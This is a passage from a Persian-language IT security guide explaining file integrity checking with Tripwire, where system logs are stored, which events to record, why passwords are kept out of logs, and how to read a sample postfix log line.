‫ﻼ ﻳـﻚ ﺭﺳـﺎﻧﺔ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﻳـﺎ ﻳﻜﺒـﺎﺭ‬
‫ﻧﻮﺷﺘﻨﻲ( ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ‪ ،‬ﻫﺮ ﺗﻐﻴﻴﺮ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺍﻣﻀﺎﮔﻴﺮﻱ ﻣﺠﺪﺩ ﻭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺍﻣﻀﺎﻱ ﺁﻥ ﻧﺴﺨﺔ ﺳﺎﻟﻢ ﺑﺮﺍﺣﺘـﻲ ﺗـﺸﺨﻴﺺ ﺩﺍﺩ‪.‬‬

‫‪333 Protection Modes‬‬


‫‪334 Attributes‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٢٦‬‬

‫ﻳﻚ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭼﻨﺪﺑﺴﺘﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ‪ (http://www.tripwire.com) Tripwire‬ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﻭ ﻣﺘﻦﺑﺎﺯ ﺁﻥ‬
‫ﺩﺭ ‪ Linux‬ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‬
‫ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ‪ ،‬ﻓﺎﻳﻠﻲ ﺍﺳﺖ ﻛﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻣﻲﺷﻮﺩ‪ .‬ﺭﺧﺪﺍﺩﻫﺎﻱ ﻗﺎﺑﻞ ﺛﺒﺖ ﻳﺎ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺛﺒﺘﻲ‪ ،٣٣٥‬ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻳـﺎ ﺷـﺮﻭﻁ‬
‫ﺧﺎﺻﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻧﻮﻳﺴﻨﺪﺓ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺯﺵ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﺩﺍﺭﻧﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻳﻜﻲ ﺍﺯ ﻋﻨﺎﺻﺮ ﻣﻬﻢ ﺗﺸﻜﻴﻞﺩﻫﻨﺪﺓ ﻳﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺍﻣﻦ ﻫﺴﺘﻨﺪ‪ :‬ﺑﺎ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﻳﻚ ﺗﺎﺭﻳﺨﭽﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺳﻠﺴﻠﺔ ﻣﻤﻴﺰﻱ ﺍﺯ ﮔﺬﺷﺘﺔ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﻛـﻪ ﺭﺩﻳـﺎﺑﻲ ﻣـﺸﻜﻼﺕ ﻭ ﺣﻤـﻼﺕ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻗﻄﻌﺎﺕ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﻛﻨﺎﺭ ﻫﻢ ﺑﮕﺬﺍﺭﻳﺪ ﻭ ﺩﻟﻴﻞ ﻳﻚ ﺍﺷﻜﺎﻝ‪ ،‬ﻣﺒـﺪﺃ ﻳـﻚ‬
‫ﻧﻔﻮﺫ‪ ،‬ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﺻﺪﻣﺎﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﻛﺸﻒ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﻣﻮﺍﺭﺩﻳﻜﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺟﻠﻮﻱ ﺻﺪﻣﺎﺕ ﺭﺍ ﺑﮕﻴﺮﻳـﺪ ﺣـﺪﺍﻗﻞ ﺳـﺎﺑﻘﻪﺍﻱ ﺍﺯ ﺁﻧـﺮﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ‪ .‬ﺁﻥ ﺛﺒﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻗﻴﻘﹰﺎ ﻫﻤﺎﻥ ﭼﻴﺰﻱ ﺑﺎﺷﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺑﺎﺯﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ‪ ،‬ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺷﻬﺎﺩﺕ ﺩﺍﺩﻥ ﺩﺭ‬
‫ﺩﺍﺩﮔﺎﻩ‪ ،‬ﻳﺎ ﮔﺮﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺧﺴﺎﺭﺗﻬﺎ ﺍﺯ ﺷﺮﮐﺖ ﺑﻴﻤﻪ ﻻﺯﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺫﺧﻴﺮﺓ ﺛﺒﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪:‬‬
‫ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺭﺧﺪﺍﺩ ﺭﻭﻱ ﺁﻥ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺫﺧﻴﺮﻩ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺟﺪﻳﺪ ‪ Unix‬ﺛﺒﺘﻬـﺎ ﺩﺭ‬ ‫•‬
‫ﺷﺎﺧﺔ ‪ /var/log‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﺑﻌﻀﻲ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺷﺮﺍﻳﻂ ﺧﺎﺹ ﺍﺯ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﭘﻴﺎﻣﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ ﻭﺍﺣﺪ ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﻨﺪ )ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﺭ‬
‫ﻓﺎﻳﻞ ‪(C:\WINNT\system32\config\SysEvent.Evt‬؛ ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﺑﺴﺘﺮﻫﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻨﻔـﺮﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ‬
‫ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺛﺒﺘﻬﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻓﺮﺳﺘﺎﺩ ﺗﺎ ﻫﻤﮕﻲ ﺑﺼﻮﺭﺕ ﻳﻜﺠﺎ ﻭ ﺩﺭﮐﻨﺎﺭ ﻫﻢ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺭﺍﻳﺎﻧـﺔ ﺭﺍﻩ‬ ‫•‬
‫ﺩﻭﺭ ﻛﻪ ﮔﺎﻫﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒﺖ‪ ٣٣٦‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺤﻞ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺭﻭﻱ‬
‫ﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛـﺮﺩ ﻛـﻪ‬ ‫ﻳﻚ ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒﺖ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗ ﹺ‬
‫ﺍﻃﻼﻋﺎﺕ ﺛﺒﺘﻲ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻭﻟﻲ ﻧﺘﻮﺍﻧﺪ ﻫﻴﭻ ﺑﺴﺘﻪﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﻔﺮﺳﺘﺪ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒـﺖ‬
‫ﺩﺭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﭘﺎﻙ ﺷﺪﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺛﺒﺖ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻣﺤﻠﻲ ﺍﻳﺪﻩﺁﻝ ﺑـﺮﺍﻱ‬
‫ﺍﺟﺮﺍﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺭﻭﻱ ﺛﺒﺘﻬﺎﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺷﺪﻩ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻳﻜﺒﺎﺭ ﻧﻮﺷﺘﻨﻲ ﻧﻮﺷﺖ ﻳﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪ‪ .‬ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺛﺒﺘﻬﺎ ﺭﺍ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ‬ ‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ‪ ،‬ﻭ ﺍﻟﺒﺘﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺣﺠﻢ ﺯﻳﺎﺩ ﺁﻧﻬﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺩﺳﺮﺳﺎﺯ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺩﻻﻳﻞ ﺍﻣﻨﻴﺘﻲ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﻛﺮﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻫﺮﭼﻨﺪ ﺗﻼﺷﻬﺎﻱ ﻧﺎﻣﻮﻓﻖ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺑﺎﻳـﺪ ﺛﺒـﺖ‬
‫ﺷﻮﻧﺪ‪ ،‬ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﮔﺮﺩﺩ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﻜﺮﺭﹰﺍ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺍﺷﺘﺒﺎﻩ ﺗﺎﻳﭗ ﻣﻲﻛﻨﻨﺪ ﻭ ﺛﺒﺖ ﺍﻳﻦ‬
‫ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺩﺭ ﻳﺎﻓﺘﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻔﻮﺫ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺷـﺨﺺ ﻛﻤـﻚ ﻛﻨـﺪ‪ .‬ﺑﺮﺧـﻲ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﺳﻴﺴﺘﻢ ﺣﺘﻲ ﺍﻋﺘﻘﺎﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺗﻼﺷﻬﺎﻱ ﻧﺎﻣﻮﻓﻖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ‪ ،‬ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ ‪ -‬ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺣﺴﺎﺑﻲ ﻛﻪ ﻛـﺎﺭﺑﺮ ﻧـﺎﻡ‬
‫ﺁﻧﺮﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻩ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺩﻟﻴﻞ ﺁﻧﻬﺎ ﻫﻢ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑﺠـﺎﻱ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬

‫‪335 Log Events‬‬


‫‪336 Log Server‬‬
‫‪٤٢٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺭﺧﺪﺍﺩﻫﺎﻳﻲ ﻛﻪ ﺛﺒﺘﺸﺎﻥ ﺿﺮﻭﺭﺕ ﺩﺍﺭﺩ‬


‫ﻫﺮﭼﻨﺪ ﺑﺮﻧﺎﻣﻪ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺧﺪﺍﺩﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭﻟﻲ ﺛﺒﺖ ﺑﻌﻀﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺭﺧﺪﺍﺩﻫﺎ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻭ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ‬
‫ﺑﻮﺳﻴﻠﺔ ﻫﺮ ﺭﺍﻳﺎﻧﺔ ﺣﺴﺎﺳﻲ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪:‬‬
‫ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺍﺗﺼﺎﻻﺕ ﺗﻠﻔﻨﻲ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟﻲ ﻣﻮﺩﻣﻬﺎ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺛﺒﺖ ﺍﻟﮕﻮﻱ ﻛﻠـﻲ ﺗﺮﺍﻓﻴـﻚ‬ ‫•‬
‫ﻱ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﻛﺸﻒ ﺯﻳﺎﺩ ﺑﻮﺩﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺷﻮﺩ ﻛﻪ ﺩﺭ ﺑﻴـﺸﺘﺮ ﻣـﻮﺍﺭﺩ ﺩﻟﻴـﻞ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﺓ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﻳـﻚ‬ ‫ﺩﺍﺩﻩﺍ ﹺ‬
‫ﻣﻬﺎﺟﻢ ﺍﺯ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﺔ ﺷﻤﺎ ﺍﺳﺖ؛‬
‫ﺯﻣﺎﻥ ﻭ ﻣﺤﻞ ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ‪ .‬ﺍﮔﺮ ﻛﺴﻲ ﺍﺯ ﺧﺎﺭﺝ ﻛﺸﻮﺭ ﻳﺎ ﺩﺭ ﺳﺎﻋﺎﺕ ﻏﻴﺮﻋﺎﺩﻱ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣﺤﻠـﻲ‬ ‫•‬
‫ﻭﺍﺭﺩ ﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻧﺔ ﻳﻚ ﺗﻬﺎﺟﻢ ﺑﺎﺷﺪ؛‬
‫ﺗﻼﺷﻬﺎﻱ ﻧﺎﻣﻮﻓﻖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ‪ ،‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺧﻄﺎﺭﻱ ﺑﺮﺍﻱ ﺷﻤﺎ ﺑﺎﺷﺪ ﻛﻪ ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻣﻬﺎﺟﻤﺎﻥ ﺩﺭ ﺗﻼﺵ ﻫﺴﺘﻨﺪ ﻛﻪ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧـﺔ‬ ‫•‬
‫ﺷﻤﺎ ﺷﻮﻧﺪ؛‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻣﺸﺨﺼﺎﺕ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺷﺎﻣﻞ ﺯﻣﺎﻥ ﺷﺮﻭﻉ ﻭ ﺧﺎﺗﻤﻪ‪ ،‬ﻣﻴﺰﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ‪ ،‬ﻣﺎﻟﻜﻴﺖ‪ ،‬ﻭ ﺍﻣﺘﻴﺎﺯﺍﺕ ﭘـﺮﺩﺍﺯﻩ‪ .‬ﺍﻳـﻦ ﻧـﻮﻉ‬ ‫•‬
‫ﺛﺒﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﺩﺳﺘﻮﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺍﺟﺮﺍ ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛﻨﺪ ﻭ ﺩﺭ ﺗﺤﻠﻴﻞ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ )ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ‬
‫ﺩﺳﺖﻧﺨﻮﺭﺩﻩ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻩ ﺑﺎﺷﺪ(؛‬
‫ﺧﺎﻣﻮﺵﺷﺪﻧﻬﺎ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻳﻬﺎﻱ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ‪ .‬ﺗﻜﺮﺍﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻳﻬﺎﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻣﻲﺗﻮﺍﻧﺪ ﻋﻼﻣﺖ ﻳﻚ ﻣﺸﻜﻞ ﺳﺨﺖﺍﻓـﺰﺍﺭﻱ‪ ،‬ﻭﺟـﻮﺩ‬ ‫•‬
‫ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﺠﺪﺩ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ ،‬ﻳـﺎ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺭﺍﻩ ﺩﻭﺭ ﻛـﻪ‬
‫ﻣﻲﺧﻮﺍﺳﺘﻪ ﺭﺩﭘﺎﻳﺶ ﺩﺭ ﺣﺎﻓﻈﻪ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ ﺑﺎﺷﺪ؛ ﻭ‬
‫ﻲ ﮔﺰﺍﺭﺵﺷﺪﻩ ﺗﻮﺳﻂ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ )ﻣﺜﻞ ﭘﺮﺷﺪﻥ ﺩﻳﺴﻚ(‪ .‬ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻫﻤﻴﺸﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﻮﺟـﻪ ﻫـﺴﺘﻨﺪ؛ ﭼـﻪ ﺗﻮﺳـﻂ‬ ‫ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﺳﺘﺜﻨﺎﻳ ﹺ‬ ‫•‬
‫ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﺷﻨﺪ ﻭ ﭼﻪ ﻣﺤﺼﻮﻝ ﺭﻭﻧﺪ ﻃﺒﻴﻌﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺩﺭ ﻫﺮ ﺭﺧﺪﺍﺩﻱ ﻛﻪ ﺛﺒﺖ ﻣﻲﺷﻮﺩ ﺑﺎﻳﺪ ﭘﺮﺩﺍﺯﺓ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﺁﻥ‪ ،‬ﻭ ﺗﺎﺭﻳﺦ ﻭ ﺳﺎﻋﺖ ﺭﺍ ﻧﻴﺰ ﺛﺒﺖ ﻛﺮﺩ‪ .‬ﺍﻛﺜﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺛﺒـﺖﻛﻨﻨـﺪﻩ‪ ،‬ﺑـﻪ ﻫـﺮ‬
‫ﺭﺧﺪﺍﺩ ﻳﻚ "ﮔﺮﻭﻩ" ﻛﻪ ﻣﺒﺪﺃ ﺁﻧﺮﺍ ﺗﻮﺻﻴﻒ ﻣﻲﻛﻨﺪ )ﻣﺎﻧﻨﺪ "ﻧﺎﻣﻪ"‪" ،‬ﺷﺒﻜﻪ"‪ ،‬ﻭ ﻳﺎ "ﻫﺴﺘﻪ"(‪ ،‬ﻭ ﻳﻚ "ﺣﺴﺎﺳﻴﺖ" ﻳﺎ "ﺷﺪﺕ" ﻛﻪ ﺑﻴﺎﻧﮕﺮ ﺍﻫﻤﻴﺖ ﺁﻥ ﺍﺳﺖ‬
‫)ﻣﺎﻧﻨﺪ "ﺟﻬﺖ ﺍﻃﻼﻉ"‪" ،‬ﺍﺧﻄﺎﺭ"‪ ،‬ﻭ ﻳﺎ "ﺧﻄﺎﻱ ﺑﺤﺮﺍﻧﻲ"( ﻧﺴﺒﺖ ﻣﻲﺩﻫﻨﺪ‪ .‬ﻣﺜﺎﻝ ﺯﻳﺮ ﭘﻴﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ Unix‬ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪:‬‬

‫‪Aug 14 08:02:12 «mail.info» r2 postfix/local[81859]: 80AD8E44308:‬‬


‫‪to=«jhalonen@ex.com», relay=local,delay=1, status=bounced (unknown‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫)"‪user: "jhalonen‬‬
‫ﺍﻳﻦ ﭘﻴﺎﻡ ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﺔ ‪ postfix‬ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﭘﻴﺎﻡ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﺪ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺎ ﺷﻨﺎﺳـﺔ ‪80AD8E44308‬‬
‫ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮ ‪ jhalonen@ex.com‬ﺩﺭﻳﺎﻓــﺖ ﺷــﺪ‪ ،‬ﻭ ﻣــﻲﮔﻮﻳــﺪ ﻛــﻪ ﺁﻥ ﭘﻴــﺎﻡ ﺑــﻪ ﺣﺎﻟــﺖ ﺗﻌﻠﻴــﻖ ﺩﺭ ﺁﻣــﺪ‪ ،‬ﭼــﻮﻥ ﻛــﺎﺭﺑﺮ‬
‫‪٣٣٧‬‬
‫‪ jhalonen@ex.com‬ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺷﺖ‪"" .‬ﮔﺮﻭﻩ" ﺍﻳﻦ ﻭﺍﻗﻌﻪ "ﻧﺎﻣﻪ" )‪ (mail‬ﻭ ﺣﺴﺎﺳﻴﺖ ﺁﻥ "ﺟﻬﺖ ﺍﻃﻼﻉ" )‪ (info‬ﻣﻲﺑﺎﺷﺪ‪.‬‬

‫ﺗﺤﻠﻴﻞ ﻓﺎﻳﻞ ﺛﺒﺖ‬


